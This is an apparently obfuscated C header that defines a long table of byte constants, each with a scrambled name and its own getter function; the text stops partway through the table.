#ifndef _DEFS_TBL
#define _DEFS_TBL 1
static const uint8_t __OWJmMDExNmbz=0x9B;
extern uint8_t __stdcall __OWJmMDExNmbz_g(){ return __OWJmMDExNmbz; };
static const uint8_t __ZjAxMTZmZjPp=0xF0;
extern uint8_t __stdcall __ZjAxMTZmZjPp_g(){ return __ZjAxMTZmZjPp; };
static const uint8_t __MTE2ZmYzZTlf=0x11;
extern uint8_t __stdcall __MTE2ZmYzZTlf_g(){ return __MTE2ZmYzZTlf; };
static const uint8_t __NmZmM2U5NWa7=0x6F;
extern uint8_t __stdcall __NmZmM2U5NWa7_g(){ return __NmZmM2U5NWa7; };
static const uint8_t __ZjNlOTVmYmLV=0xF3;
extern uint8_t __stdcall __ZjNlOTVmYmLV_g(){ return __ZjNlOTVmYmLV; };
static const uint8_t __ZTk1ZmJiZDX1=0xE9;
extern uint8_t __stdcall __ZTk1ZmJiZDX1_g(){ return __ZTk1ZmJiZDX1; };
static const uint8_t __NWZiYmQ1ZjWj=0x5F;
extern uint8_t __stdcall __NWZiYmQ1ZjWj_g(){ return __NWZiYmQ1ZjWj; };
static const uint8_t __YmJkNWY1YTPB=0xBB;
extern uint8_t __stdcall __YmJkNWY1YTPB_g(){ return __YmJkNWY1YTPB; };
static const uint8_t __ZDVmNWEzYzE9=0xD5;
extern uint8_t __stdcall __ZDVmNWEzYzE9_g(){ return __ZDVmNWEzYzE9; };
static const uint8_t __ZjVhM2MxM2Tq=0xF5;
extern uint8_t __stdcall __ZjVhM2MxM2Tq_g(){ return __ZjVhM2MxM2Tq; };
static const uint8_t __YTNjMTNkZWED=0xA3;
extern uint8_t __stdcall __YTNjMTNkZWED_g(){ return __YTNjMTNkZWED; };
static const uint8_t __YzEzZGVhMDMa=0xC1;
extern uint8_t __stdcall __YzEzZGVhMDMa_g(){ return __YzEzZGVhMDMa; };
static const uint8_t __M2RlYTAzMWGh=0x3D;
extern uint8_t __stdcall __M2RlYTAzMWGh_g(){ return __M2RlYTAzMWGh; };
static const uint8_t __ZWEwMzFhYTHL=0xEA;
extern uint8_t __stdcall __ZWEwMzFhYTHL_g(){ return __ZWEwMzFhYTHL; };
static const uint8_t __MDMxYWExY2L3=0x03;
extern uint8_t __stdcall __MDMxYWExY2L3_g(){ return __MDMxYWExY2L3; };
static const uint8_t __MWFhMWNiZjcx=0x1A;
extern uint8_t __stdcall __MWFhMWNiZjcx_g(){ return __MWFhMWNiZjcx; };
static const uint8_t __YTFjYmY3MzH0=0xA1;
extern uint8_t __stdcall __YTFjYmY3MzH0_g(){ return __YTFjYmY3MzH0; };
static const uint8_t __Y2JmNzMxZjS0=0xCB;
extern uint8_t __stdcall __Y2JmNzMxZjS0_g(){ return __Y2JmNzMxZjS0; };
static const uint8_t __ZjczMWY0YjRE=0xF7;
extern uint8_t __stdcall __ZjczMWY0YjRE_g(){ return __ZjczMWY0YjRE; };
static const uint8_t __MzFmNGI0NDQI=0x31;
extern uint8_t __stdcall __MzFmNGI0NDQI_g(){ return __MzFmNGI0NDQI; };
static const uint8_t __ZjRiNDQ0MDjr=0xF4;
extern uint8_t __stdcall __ZjRiNDQ0MDjr_g(){ return __ZjRiNDQ0MDjr; };
static const uint8_t __YjQ0NDA4ZWKA=0xB4;
extern uint8_t __stdcall __YjQ0NDA4ZWKA_g(){ return __YjQ0NDA4ZWKA; };
static const uint8_t __NDQwOGViODBw=0x44;
extern uint8_t __stdcall __NDQwOGViODBw_g(){ return __NDQwOGViODBw; };
static const uint8_t __MDhlYjgwNzCl=0x08;
extern uint8_t __stdcall __MDhlYjgwNzCl_g(){ return __MDhlYjgwNzCl; };
static const uint8_t __ZWI4MDcwYTVq=0xEB;
extern uint8_t __stdcall __ZWI4MDcwYTVq_g(){ return __ZWI4MDcwYTVq; };
static const uint8_t __ODA3MGE1NmGy=0x80;
extern uint8_t __stdcall __ODA3MGE1NmGy_g(){ return __ODA3MGE1NmGy; };
static const uint8_t __NzBhNTZhYjK4=0x70;
extern uint8_t __stdcall __NzBhNTZhYjK4_g(){ return __NzBhNTZhYjK4; };
static const uint8_t __YTU2YWIyYjgQ=0xA5;
extern uint8_t __stdcall __YTU2YWIyYjgQ_g(){ return __YTU2YWIyYjgQ; };
static const uint8_t __NmFiMmI4MTAX=0x6A;
extern uint8_t __stdcall __NmFiMmI4MTAX_g(){ return __NmFiMmI4MTAX; };
static const uint8_t __YjJiODEwMTdD=0xB2;
extern uint8_t __stdcall __YjJiODEwMTdD_g(){ return __YjJiODEwMTdD; };
static const uint8_t __YjgxMDE3NDNK=0xB8;
extern uint8_t __stdcall __YjgxMDE3NDNK_g(){ return __YjgxMDE3NDNK; };
static const uint8_t __MTAxNzQzNGFS=0x10;
extern uint8_t __stdcall __MTAxNzQzNGFS_g(){ return __MTAxNzQzNGFS; };
static const uint8_t __MTc0MzRhNTI_=0x17;
extern uint8_t __stdcall __MTc0MzRhNTI__g(){ return __MTc0MzRhNTI_; };
static const uint8_t __NDM0YTUyM2bi=0x43;
extern uint8_t __stdcall __NDM0YTUyM2bi_g(){ return __NDM0YTUyM2bi; };
static const uint8_t __NGE1MjNmZTKi=0x4A;
extern uint8_t __stdcall __NGE1MjNmZTKi_g(){ return __NGE1MjNmZTKi; };
static const uint8_t __NTIzZmUyYTKe=0x52;
extern uint8_t __stdcall __NTIzZmUyYTKe_g(){ return __NTIzZmUyYTKe; };
static const uint8_t __M2ZlMmEyOWUK=0x3F;
extern uint8_t __stdcall __M2ZlMmEyOWUK_g(){ return __M2ZlMmEyOWUK; };
static const uint8_t __ZTJhMjllMGH4=0xE2;
extern uint8_t __stdcall __ZTJhMjllMGH4_g(){ return __ZTJhMjllMGH4; };
static const uint8_t __YTI5ZTBhZjiP=0xA2;
extern uint8_t __stdcall __YTI5ZTBhZjiP_g(){ return __YTI5ZTBhZjiP; };
static const uint8_t __OWUwYWY4OGYc=0x9E;
extern uint8_t __stdcall __OWUwYWY4OGYc_g(){ return __OWUwYWY4OGYc; };
static const uint8_t __MGFmODhmMWOx=0x0A;
extern uint8_t __stdcall __MGFmODhmMWOx_g(){ return __MGFmODhmMWOx; };
static const uint8_t __Zjg4ZjFjYjF3=0xF8;
extern uint8_t __stdcall __Zjg4ZjFjYjF3_g(){ return __Zjg4ZjFjYjF3; };
static const uint8_t __OGYxY2IxNzeO=0x8F;
extern uint8_t __stdcall __OGYxY2IxNzeO_g(){ return __OGYxY2IxNzeO; };
static const uint8_t __MWNiMTc3OGWs=0x1C;
extern uint8_t __stdcall __MWNiMTc3OGWs_g(){ return __MWNiMTc3OGWs; };
static const uint8_t __YjE3NzhlYWOC=0xB1;
extern uint8_t __stdcall __YjE3NzhlYWOC_g(){ return __YjE3NzhlYWOC; };
static const uint8_t __Nzc4ZWFjODJV=0x77;
extern uint8_t __stdcall __Nzc4ZWFjODJV_g(){ return __Nzc4ZWFjODJV; };
static const uint8_t __OGVhYzgyNTVN=0x8E;
extern uint8_t __stdcall __OGVhYzgyNTVN_g(){ return __OGVhYzgyNTVN; };
static const uint8_t __YWM4MjU1NGTl=0xAC;
extern uint8_t __stdcall __YWM4MjU1NGTl_g(){ return __YWM4MjU1NGTl; };
static const uint8_t __ODI1NTRkZTXE=0x82;
extern uint8_t __stdcall __ODI1NTRkZTXE_g(){ return __ODI1NTRkZTXE; };
static const uint8_t __NTU0ZGU1YzTa=0x55;
extern uint8_t __stdcall __NTU0ZGU1YzTa_g(){ return __NTU0ZGU1YzTa; };
static const uint8_t __NGRlNWM0ZGGn=0x4D;
extern uint8_t __stdcall __NGRlNWM0ZGGn_g(){ return __NGRlNWM0ZGGn; };
static const uint8_t __ZTVjNGRhYTdT=0xE5;
extern uint8_t __stdcall __ZTVjNGRhYTdT_g(){ return __ZTVjNGRhYTdT; };
static const uint8_t __YzRkYWE3NTP8=0xC4;
extern uint8_t __stdcall __YzRkYWE3NTP8_g(){ return __YzRkYWE3NTP8; };
static const uint8_t __ZGFhNzUzZmNF=0xDA;
extern uint8_t __stdcall __ZGFhNzUzZmNF_g(){ return __ZGFhNzUzZmNF; };
static const uint8_t __YTc1M2ZjNDX9=0xA7;
extern uint8_t __stdcall __YTc1M2ZjNDX9_g(){ return __YTc1M2ZjNDX9; };
static const uint8_t __NTNmYzQ1ZmQe=0x53;
extern uint8_t __stdcall __NTNmYzQ1ZmQe_g(){ return __NTNmYzQ1ZmQe; };
static const uint8_t __ZmM0NWZkMWVR=0xFC;
extern uint8_t __stdcall __ZmM0NWZkMWVR_g(){ return __ZmM0NWZkMWVR; };
static const uint8_t __NDVmZDFlNTHv=0x45;
extern uint8_t __stdcall __NDVmZDFlNTHv_g(){ return __NDVmZDFlNTHv; };
static const uint8_t __ZmQxZTUxZWaQ=0xFD;
extern uint8_t __stdcall __ZmQxZTUxZWaQ_g(){ return __ZmQxZTUxZWaQ; };
static const uint8_t __MWU1MWVmOTBG=0x1E;
extern uint8_t __stdcall __MWU1MWVmOTBG_g(){ return __MWU1MWVmOTBG; };
static const uint8_t __NTFlZjkwNDYP=0x51;
extern uint8_t __stdcall __NTFlZjkwNDYP_g(){ return __NTFlZjkwNDYP; };
static const uint8_t __ZWY5MDQ2MGYy=0xEF;
extern uint8_t __stdcall __ZWY5MDQ2MGYy_g(){ return __ZWY5MDQ2MGYy; };
static const uint8_t __OTA0NjBmMzIA=0x90;
extern uint8_t __stdcall __OTA0NjBmMzIA_g(){ return __OTA0NjBmMzIA; };
static const uint8_t __NDYwZjMyMDDd=0x46;
extern uint8_t __stdcall __NDYwZjMyMDDd_g(){ return __NDYwZjMyMDDd; };
static const uint8_t __MGYzMjAwZGQ0=0x0F;
extern uint8_t __stdcall __MGYzMjAwZGQ0_g(){ return __MGYzMjAwZGQ0; };
static const uint8_t __MzIwMGRkMzRz=0x32;
extern uint8_t __stdcall __MzIwMGRkMzRz_g(){ return __MzIwMGRkMzRz; };
static const uint8_t __MDBkZDM0NzPx=0x00;
extern uint8_t __stdcall __MDBkZDM0NzPx_g(){ return __MDBkZDM0NzPx; };
static const uint8_t __ZGQzNDczZjEj=0xDD;
extern uint8_t __stdcall __ZGQzNDczZjEj_g(){ return __ZGQzNDczZjEj; };
static const uint8_t __MzQ3M2YxMjNy=0x34;
extern uint8_t __stdcall __MzQ3M2YxMjNy_g(){ return __MzQ3M2YxMjNy; };
static const uint8_t __NzNmMTIzNzJm=0x73;
extern uint8_t __stdcall __NzNmMTIzNzJm_g(){ return __NzNmMTIzNzJm; };
static const uint8_t __ZjEyMzcyNjbG=0xF1;
extern uint8_t __stdcall __ZjEyMzcyNjbG_g(){ return __ZjEyMzcyNjbG; };
static const uint8_t __MjM3MjY2YzaN=0x23;
extern uint8_t __stdcall __MjM3MjY2YzaN_g(){ return __MjM3MjY2YzaN; };
static const uint8_t __NzI2NmM2OGTF=0x72;
extern uint8_t __stdcall __NzI2NmM2OGTF_g(){ return __NzI2NmM2OGTF; };
static const uint8_t __NjZjNjhkYzXD=0x66;
extern uint8_t __stdcall __NjZjNjhkYzXD_g(){ return __NjZjNjhkYzXD; };
static const uint8_t __YzY4ZGM1YzPI=0xC6;
extern uint8_t __stdcall __YzY4ZGM1YzPI_g(){ return __YzY4ZGM1YzPI; };
static const uint8_t __OGRjNWMzYzg_=0x8D;
extern uint8_t __stdcall __OGRjNWMzYzg__g(){ return __OGRjNWMzYzg_; };
static const uint8_t __YzVjM2M4M2Wg=0xC5;
extern uint8_t __stdcall __YzVjM2M4M2Wg_g(){ return __YzVjM2M4M2Wg; };
static const uint8_t __YzNjODNlYTB0=0xC3;
extern uint8_t __stdcall __YzNjODNlYTB0_g(){ return __YzNjODNlYTB0; };
static const uint8_t __YzgzZWEwNzQl=0xC8;
extern uint8_t __stdcall __YzgzZWEwNzQl_g(){ return __YzgzZWEwNzQl; };
static const uint8_t __M2VhMDc0MjWH=0x3E;
extern uint8_t __stdcall __M2VhMDc0MjWH_g(){ return __M2VhMDc0MjWH; };
static const uint8_t __YTA3NDI1ODds=0xA0;
extern uint8_t __stdcall __YTA3NDI1ODds_g(){ return __YTA3NDI1ODds; };
static const uint8_t __NzQyNTg3NmPP=0x74;
extern uint8_t __stdcall __NzQyNTg3NmPP_g(){ return __NzQyNTg3NmPP; };
static const uint8_t __MjU4NzZjY2ak=0x25;
extern uint8_t __stdcall __MjU4NzZjY2ak_g(){ return __MjU4NzZjY2ak; };
static const uint8_t __ODc2Y2NmYTRe=0x87;
extern uint8_t __stdcall __ODc2Y2NmYTRe_g(){ return __ODc2Y2NmYTRe; };
static const uint8_t __NmNjZmE0NWWD=0x6C;
extern uint8_t __stdcall __NmNjZmE0NWWD_g(){ return __NmNjZmE0NWWD; };
static const uint8_t __Y2ZhNDVlODPh=0xCF;
extern uint8_t __stdcall __Y2ZhNDVlODPh_g(){ return __Y2ZhNDVlODPh; };
static const uint8_t __YTQ1ZTgzZTE3=0xA4;
extern uint8_t __stdcall __YTQ1ZTgzZTE3_g(){ return __YTQ1ZTgzZTE3; };
static const uint8_t __NWU4M2UxMzdU=0x5E;
extern uint8_t __stdcall __NWU4M2UxMzdU_g(){ return __NWU4M2UxMzdU; };
static const uint8_t __ODNlMTM3NTQb=0x83;
extern uint8_t __stdcall __ODNlMTM3NTQb_g(){ return __ODNlMTM3NTQb; };
static const uint8_t __ZTEzNzU0MWJ4=0xE1;
extern uint8_t __stdcall __ZTEzNzU0MWJ4_g(){ return __ZTEzNzU0MWJ4; };
static const uint8_t __Mzc1NDFiNzhh=0x37;
extern uint8_t __stdcall __Mzc1NDFiNzhh_g(){ return __Mzc1NDFiNzhh; };
static const uint8_t __NTQxYjc4NjGd=0x54;
extern uint8_t __stdcall __NTQxYjc4NjGd_g(){ return __NTQxYjc4NjGd; };
static const uint8_t __MWI3ODYxOWQ6=0x1B;
extern uint8_t __stdcall __MWI3ODYxOWQ6_g(){ return __MWI3ODYxOWQ6; };
static const uint8_t __Nzg2MTlkM2G8=0x78;
extern uint8_t __stdcall __Nzg2MTlkM2G8_g(){ return __Nzg2MTlkM2G8; };
static const uint8_t __NjE5ZDNhYmNJ=0x61;
extern uint8_t __stdcall __NjE5ZDNhYmNJ_g(){ return __NjE5ZDNhYmNJ; };
static const uint8_t __OWQzYWJjNDmz=0x9D;
extern uint8_t __stdcall __OWQzYWJjNDmz_g(){ return __OWQzYWJjNDmz; };
static const uint8_t __M2FiYzQ5YjNt=0x3A;
extern uint8_t __stdcall __M2FiYzQ5YjNt_g(){ return __M2FiYzQ5YjNt; };
static const uint8_t __YmM0OWIzNmQT=0xBC;
extern uint8_t __stdcall __YmM0OWIzNmQT_g(){ return __YmM0OWIzNmQT; };
static const uint8_t __NDliMzZkMTMd=0x49;
extern uint8_t __stdcall __NDliMzZkMTMd_g(){ return __NDliMzZkMTMd; };
static const uint8_t __YjM2ZDEzMWTA=0xB3;
extern uint8_t __stdcall __YjM2ZDEzMWTA_g(){ return __YjM2ZDEzMWTA; };
static const uint8_t __NmQxMzFkYzB_=0x6D;
extern uint8_t __stdcall __NmQxMzFkYzB__g(){ return __NmQxMzFkYzB_; };
static const uint8_t __MTMxZGMwN2Vo=0x13;
extern uint8_t __stdcall __MTMxZGMwN2Vo_g(){ return __MTMxZGMwN2Vo; };
static const uint8_t __MWRjMDdlNjip=0x1D;
extern uint8_t __stdcall __MWRjMDdlNjip_g(){ return __MWRjMDdlNjip; };
static const uint8_t __YzA3ZTY4YTnb=0xC0;
extern uint8_t __stdcall __YzA3ZTY4YTnb_g(){ return __YzA3ZTY4YTnb; };
static const uint8_t __N2U2OGE5ZGIC=0x7E;
extern uint8_t __stdcall __N2U2OGE5ZGIC_g(){ return __N2U2OGE5ZGIC; };
static const uint8_t __NjhhOWRiMDIG=0x68;
extern uint8_t __stdcall __NjhhOWRiMDIG_g(){ return __NjhhOWRiMDIG; };
static const uint8_t __YTlkYjAyMDb7=0xA9;
extern uint8_t __stdcall __YTlkYjAyMDb7_g(){ return __YTlkYjAyMDb7; };
static const uint8_t __ZGIwMjA2ZmJx=0xDB;
extern uint8_t __stdcall __ZGIwMjA2ZmJx_g(){ return __ZGIwMjA2ZmJx; };
static const uint8_t __MDIwNmZiNzGZ=0x02;
extern uint8_t __stdcall __MDIwNmZiNzGZ_g(){ return __MDIwNmZiNzGZ; };
static const uint8_t __MDZmYjcxOTko=0x06;
extern uint8_t __stdcall __MDZmYjcxOTko_g(){ return __MDZmYjcxOTko; };
static const uint8_t __ZmI3MTk5MjhI=0xFB;
extern uint8_t __stdcall __ZmI3MTk5MjhI_g(){ return __ZmI3MTk5MjhI; };
static const uint8_t __NzE5OTI4NDi1=0x71;
extern uint8_t __stdcall __NzE5OTI4NDi1_g(){ return __NzE5OTI4NDi1; };
static const uint8_t __OTkyODQ4YjXH=0x99;
extern uint8_t __stdcall __OTkyODQ4YjXH_g(){ return __OTkyODQ4YjXH; };
static const uint8_t __Mjg0OGI1Yzdd=0x28;
extern uint8_t __stdcall __Mjg0OGI1Yzdd_g(){ return __Mjg0OGI1Yzdd; };
static const uint8_t __NDhiNWM3NWT5=0x48;
extern uint8_t __stdcall __NDhiNWM3NWT5_g(){ return __NDhiNWM3NWT5; };
static const uint8_t __YjVjNzVkZjkM=0xB5;
extern uint8_t __stdcall __YjVjNzVkZjkM_g(){ return __YjVjNzVkZjkM; };
static const uint8_t __Yzc1ZGY5MGOS=0xC7;
extern uint8_t __stdcall __Yzc1ZGY5MGOS_g(){ return __Yzc1ZGY5MGOS; };
static const uint8_t __NWRmOTBjOTJX=0x5D;
extern uint8_t __stdcall __NWRmOTBjOTJX_g(){ return __NWRmOTBjOTJX; };
static const uint8_t __ZjkwYzkyNTet=0xF9;
extern uint8_t __stdcall __ZjkwYzkyNTet_g(){ return __ZjkwYzkyNTet; };
static const uint8_t __MGM5MjU3YWRg=0x0C;
extern uint8_t __stdcall __MGM5MjU3YWRg_g(){ return __MGM5MjU3YWRg; };
static const uint8_t __OTI1N2FkNjBP=0x92;
extern uint8_t __stdcall __OTI1N2FkNjBP_g(){ return __OTI1N2FkNjBP; };
static const uint8_t __NTdhZDYwNGZO=0x57;
extern uint8_t __stdcall __NTdhZDYwNGZO_g(){ return __NTdhZDYwNGZO; };
static const uint8_t __YWQ2MDRmNGUv=0xAD;
extern uint8_t __stdcall __YWQ2MDRmNGUv_g(){ return __YWQ2MDRmNGUv; };
static const uint8_t __NjA0ZjRlMmaf=0x60;
extern uint8_t __stdcall __NjA0ZjRlMmaf_g(){ return __NjA0ZjRlMmaf; };
static const uint8_t __NGY0ZTJmOWZW=0x4F;
extern uint8_t __stdcall __NGY0ZTJmOWZW_g(){ return __NGY0ZTJmOWZW; };
static const uint8_t __NGUyZjlmNTYm=0x4E;
extern uint8_t __stdcall __NGUyZjlmNTYm_g(){ return __NGUyZjlmNTYm; };
static const uint8_t __MmY5ZjU2Mja_=0x2F;
extern uint8_t __stdcall __MmY5ZjU2Mja__g(){ return __MmY5ZjU2Mja_; };
static const uint8_t __OWY1NjI2YmbN=0x9F;
extern uint8_t __stdcall __OWY1NjI2YmbN_g(){ return __OWY1NjI2YmbN; };
static const uint8_t __NTYyNmJmY2TZ=0x56;
extern uint8_t __stdcall __NTYyNmJmY2TZ_g(){ return __NTYyNmJmY2TZ; };
static const uint8_t __MjZiZmNkZDl6=0x26;
extern uint8_t __stdcall __MjZiZmNkZDl6_g(){ return __MjZiZmNkZDl6; };
static const uint8_t __YmZjZGQ5N2GF=0xBF;
extern uint8_t __stdcall __YmZjZGQ5N2GF_g(){ return __YmZjZGQ5N2GF; };
static const uint8_t __Y2RkOTdhODUf=0xCD;
extern uint8_t __stdcall __Y2RkOTdhODUf_g(){ return __Y2RkOTdhODUf; };
static const uint8_t __ZDk3YTg1MWbu=0xD9;
extern uint8_t __stdcall __ZDk3YTg1MWbu_g(){ return __ZDk3YTg1MWbu; };
static const uint8_t __N2E4NTFmZWW9=0x7A;
extern uint8_t __stdcall __N2E4NTFmZWW9_g(){ return __N2E4NTFmZWW9; };
static const uint8_t __ODUxZmVlYmTy=0x85;
extern uint8_t __stdcall __ODUxZmVlYmTy_g(){ return __ODUxZmVlYmTy; };
static const uint8_t __MWZlZWJkZjLs=0x1F;
extern uint8_t __stdcall __MWZlZWJkZjLs_g(){ return __MWZlZWJkZjLs; };
static const uint8_t __ZWViZGYyZWNu=0xEE;
extern uint8_t __stdcall __ZWViZGYyZWNu_g(){ return __ZWViZGYyZWNu; };
static const uint8_t __YmRmMmVjNmWM=0xBD;
extern uint8_t __stdcall __YmRmMmVjNmWM_g(){ return __YmRmMmVjNmWM; };
static const uint8_t __ZjJlYzZlOGNB=0xF2;
extern uint8_t __stdcall __ZjJlYzZlOGNB_g(){ return __ZjJlYzZlOGNB; };
static const uint8_t __ZWM2ZThjNDHK=0xEC;
extern uint8_t __stdcall __ZWM2ZThjNDHK_g(){ return __ZWM2ZThjNDHK; };
static const uint8_t __NmU4YzQxY2Et=0x6E;
extern uint8_t __stdcall __NmU4YzQxY2Et_g(){ return __NmU4YzQxY2Et; };
static const uint8_t __OGM0MWNhMmR_=0x8C;
extern uint8_t __stdcall __OGM0MWNhMmR__g(){ return __OGM0MWNhMmR_; };
static const uint8_t __NDFjYTJkN2aa=0x41;
extern uint8_t __stdcall __NDFjYTJkN2aa_g(){ return __NDFjYTJkN2aa; };
static const uint8_t __Y2EyZDdmOWHR=0xCA;
extern uint8_t __stdcall __Y2EyZDdmOWHR_g(){ return __Y2EyZDdmOWHR; };
static const uint8_t __MmQ3ZjlhZDHT=0x2D;
extern uint8_t __stdcall __MmQ3ZjlhZDHT_g(){ return __MmQ3ZjlhZDHT; };
static const uint8_t __N2Y5YWQxZDPU=0x7F;
extern uint8_t __stdcall __N2Y5YWQxZDPU_g(){ return __N2Y5YWQxZDPU; };
static const uint8_t __OWFkMWQzZDQS=0x9A;
extern uint8_t __stdcall __OWFkMWQzZDQS_g(){ return __OWFkMWQzZDQS; };
static const uint8_t __ZDFkM2Q0MTK2=0xD1;
extern uint8_t __stdcall __ZDFkM2Q0MTK2_g(){ return __ZDFkM2Q0MTK2; };
static const uint8_t __ZDNkNDEyYjYN=0xD3;
extern uint8_t __stdcall __ZDNkNDEyYjYN_g(){ return __ZDNkNDEyYjYN; };
static const uint8_t __ZDQxMmI2MGRp=0xD4;
extern uint8_t __stdcall __ZDQxMmI2MGRp_g(){ return __ZDQxMmI2MGRp; };
static const uint8_t __MTJiNjBkNjll=0x12;
extern uint8_t __stdcall __MTJiNjBkNjll_g(){ return __MTJiNjBkNjll; };
static const uint8_t __YjYwZDY5NjVr=0xB6;
extern uint8_t __stdcall __YjYwZDY5NjVr_g(){ return __YjYwZDY5NjVr; };
static const uint8_t __MGQ2OTY1NmKK=0x0D;
extern uint8_t __stdcall __MGQ2OTY1NmKK_g(){ return __MGQ2OTY1NmKK; };
static const uint8_t __Njk2NTZiOGFA=0x69;
extern uint8_t __stdcall __Njk2NTZiOGFA_g(){ return __Njk2NTZiOGFA; };
static const uint8_t __NjU2YjhhNDAH=0x65;
extern uint8_t __stdcall __NjU2YjhhNDAH_g(){ return __NjU2YjhhNDAH; };
static const uint8_t __NmI4YTQwMDf_=0x6B;
extern uint8_t __stdcall __NmI4YTQwMDf__g(){ return __NmI4YTQwMDf_; };
static const uint8_t __OGE0MDA3ZmY1=0x8A;
extern uint8_t __stdcall __OGE0MDA3ZmY1_g(){ return __OGE0MDA3ZmY1; };
static const uint8_t __NDAwN2ZmMzXY=0x40;
extern uint8_t __stdcall __NDAwN2ZmMzXY_g(){ return __NDAwN2ZmMzXY; };
static const uint8_t __MDdmZjM1ZDjJ=0x07;
extern uint8_t __stdcall __MDdmZjM1ZDjJ_g(){ return __MDdmZjM1ZDjJ; };
static const uint8_t __ZmYzNWQ4Yzks=0xFF;
extern uint8_t __stdcall __ZmYzNWQ4Yzks_g(){ return __ZmYzNWQ4Yzks; };
static const uint8_t __MzVkOGM5MmME=0x35;
extern uint8_t __stdcall __MzVkOGM5MmME_g(){ return __MzVkOGM5MmME; };
static const uint8_t __ZDhjOTJjMDTc=0xD8;
extern uint8_t __stdcall __ZDhjOTJjMDTc_g(){ return __ZDhjOTJjMDTc; };
static const uint8_t __YzkyYzA0ZGMw=0xC9;
extern uint8_t __stdcall __YzkyYzA0ZGMw_g(){ return __YzkyYzA0ZGMw; };
static const uint8_t __MmMwNGRjMzB7=0x2C;
extern uint8_t __stdcall __MmMwNGRjMzB7_g(){ return __MmMwNGRjMzB7; };
static const uint8_t __MDRkYzMwN2KJ=0x04;
extern uint8_t __stdcall __MDRkYzMwN2KJ_g(){ return __MDRkYzMwN2KJ; };
static const uint8_t __ZGMzMDdiODlZ=0xDC;
extern uint8_t __stdcall __ZGMzMDdiODlZ_g(){ return __ZGMzMDdiODlZ; };
static const uint8_t __MzA3Yjg5NTmY=0x30;
extern uint8_t __stdcall __MzA3Yjg5NTmY_g(){ return __MzA3Yjg5NTmY; };
static const uint8_t __N2I4OTU5OTjM=0x7B;
extern uint8_t __stdcall __N2I4OTU5OTjM_g(){ return __N2I4OTU5OTjM; };
static const uint8_t __ODk1OTk4Y2N1=0x89;
extern uint8_t __stdcall __ODk1OTk4Y2N1_g(){ return __ODk1OTk4Y2N1; };
static const uint8_t __NTk5OGNjNzVj=0x59;
extern uint8_t __stdcall __NTk5OGNjNzVj_g(){ return __NTk5OGNjNzVj; };
static const uint8_t __OThjYzc1NjNH=0x98;
extern uint8_t __stdcall __OThjYzc1NjNH_g(){ return __OThjYzc1NjNH; };
static const uint8_t __Y2M3NTYzNDcr=0xCC;
extern uint8_t __stdcall __Y2M3NTYzNDcr_g(){ return __Y2M3NTYzNDcr; };
static const uint8_t __NzU2MzQ3MmLf=0x75;
extern uint8_t __stdcall __NzU2MzQ3MmLf_g(){ return __NzU2MzQ3MmLf; };
static const uint8_t __NjM0NzJiZGaw=0x63;
extern uint8_t __stdcall __NjM0NzJiZGaw_g(){ return __NjM0NzJiZGaw; };
static const uint8_t __NDcyYmRmYjBC=0x47;
extern uint8_t __stdcall __NDcyYmRmYjBC_g(){ return __NDcyYmRmYjBC; };
static const uint8_t __MmJkZmIwNDK_=0x2B;
extern uint8_t __stdcall __MmJkZmIwNDK__g(){ return __MmJkZmIwNDK_; };
static const uint8_t __ZGZiMDQyYmWI=0xDF;
extern uint8_t __stdcall __ZGZiMDQyYmWI_g(){ return __ZGZiMDQyYmWI; };
static const uint8_t __YjA0MmJlODgV=0xB0;
extern uint8_t __stdcall __YjA0MmJlODgV_g(){ return __YjA0MmJlODgV; };
static const uint8_t __NDJiZTg4MTWr=0x42;
extern uint8_t __stdcall __NDJiZTg4MTWr_g(){ return __NDJiZTg4MTWr; };
static const uint8_t __YmU4ODE1YWLQ=0xBE;
extern uint8_t __stdcall __YmU4ODE1YWLQ_g(){ return __YmU4ODE1YWLQ; };
static const uint8_t __ODgxNWFiZDCq=0x88;
extern uint8_t __stdcall __ODgxNWFiZDCq_g(){ return __ODgxNWFiZDCq; };
static const uint8_t __MTVhYmQwYWGL=0x15;
extern uint8_t __stdcall __MTVhYmQwYWGL_g(){ return __MTVhYmQwYWGL; };
static const uint8_t __YWJkMGFhOGIh=0xAB;
extern uint8_t __stdcall __YWJkMGFhOGIh_g(){ return __YWJkMGFhOGIh; };
static const uint8_t __ZDBhYThiMjHo=0xD0;
extern uint8_t __stdcall __ZDBhYThiMjHo_g(){ return __ZDBhYThiMjHo; };
static const uint8_t __YWE4YjIxZThc=0xAA;
extern uint8_t __stdcall __YWE4YjIxZThc_g(){ return __YWE4YjIxZThc; };
static const uint8_t __OGIyMWU4NWOo=0x8B;
extern uint8_t __stdcall __OGIyMWU4NWOo_g(){ return __OGIyMWU4NWOo; };
static const uint8_t __MjFlODVjYTha=0x21;
extern uint8_t __stdcall __MjFlODVjYTha_g(){ return __MjFlODVjYTha; };
static const uint8_t __ZTg1Y2E4NWGE=0xE8;
extern uint8_t __stdcall __ZTg1Y2E4NWGE_g(){ return __ZTg1Y2E4NWGE; };
static const uint8_t __NWNhODVhODT_=0x5C;
extern uint8_t __stdcall __NWNhODVhODT__g(){ return __NWNhODVhODT_; };
static const uint8_t __YTg1YTg0ZmWm=0xA8;
extern uint8_t __stdcall __YTg1YTg0ZmWm_g(){ return __YTg1YTg0ZmWm; };
static const uint8_t __NWE4NGZlYTb6=0x5A;
extern uint8_t __stdcall __NWE4NGZlYTb6_g(){ return __NWE4NGZlYTb6; };
static const uint8_t __ODRmZWE2ZmF8=0x84;
extern uint8_t __stdcall __ODRmZWE2ZmF8_g(){ return __ODRmZWE2ZmF8; };
static const uint8_t __ZmVhNmZhN2O6=0xFE;
extern uint8_t __stdcall __ZmVhNmZhN2O6_g(){ return __ZmVhNmZhN2O6; };
static const uint8_t __YTZmYTdjYmHm=0xA6;
extern uint8_t __stdcall __YTZmYTdjYmHm_g(){ return __YTZmYTdjYmHm; };
static const uint8_t __ZmE3Y2JhZTYi=0xFA;
extern uint8_t __stdcall __ZmE3Y2JhZTYi_g(){ return __ZmE3Y2JhZTYi; };
static const uint8_t __N2NiYWU2MjKV=0x7C;
extern uint8_t __stdcall __N2NiYWU2MjKV_g(){ return __N2NiYWU2MjKV; };
static const uint8_t __YmFlNjIyOTXS=0xBA;
extern uint8_t __stdcall __YmFlNjIyOTXS_g(){ return __YmFlNjIyOTXS; };
static const uint8_t __ZTYyMjk1ZDIF=0xE6;
extern uint8_t __stdcall __ZTYyMjk1ZDIF_g(){ return __ZTYyMjk1ZDIF; };
static const uint8_t __MjI5NWQyMDUY=0x22;
extern uint8_t __stdcall __MjI5NWQyMDUY_g(){ return __MjI5NWQyMDUY; };
static const uint8_t __OTVkMjA1MTg7=0x95;
